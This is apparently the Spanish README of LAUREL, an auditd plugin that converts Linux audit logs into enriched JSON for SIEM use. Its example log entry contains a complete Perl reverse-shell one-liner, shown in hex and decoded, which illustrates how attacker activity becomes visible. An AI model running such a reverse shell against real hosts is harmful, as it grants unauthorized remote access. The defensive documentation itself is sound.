
Transforma los registros de auditoría de Linux para uso en SIEM
LAUREL es un complemento de postprocesamiento de eventos para auditd(8) que genera registros de auditoría JSON enriquecidos y útiles, adecuados para configuraciones modernas de monitoreo de seguridad.
La documentación correspondiente a la última versión estable se puede encontrar aquí.
TLDR: En lugar de eventos de auditoría que se ven así…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL los convierte en registros JSON donde el desorden que los atacantes/probadores de penetración/equipos rojos intentan crear se vuelve evidente de un vistazo:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
Esto ocurre en el origen porque LAUREL se ejecuta en el host donde se generan los eventos de auditoría. Los eventos se enriquecen con información útil sobre el proceso padre (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Los detalles de configuración y operación se describen en la página de manual laurel(8). Los detalles sobre el formato de registro y las razones se pueden encontrar en la página de manual laurel-about(7). La página laurel-audit-rules(7) contiene consejos y ejemplos para configurar reglas de auditoría útiles para detectar las tácticas de los atacantes.
Las instrucciones de instalación de LAUREL contienen instrucciones sobre cómo compilar LAUREL desde el código fuente y cómo instalarlo y configurarlo.
Desarrollamos LAUREL porque no estábamos contentos con los conjuntos de características y las características de rendimiento de los proyectos y productos existentes. Consulte el documento Rendimiento para obtener más detalles.
GNU General Public License, versión 3
El logotipo fue creado por Birgit Meyer <[email protected]>.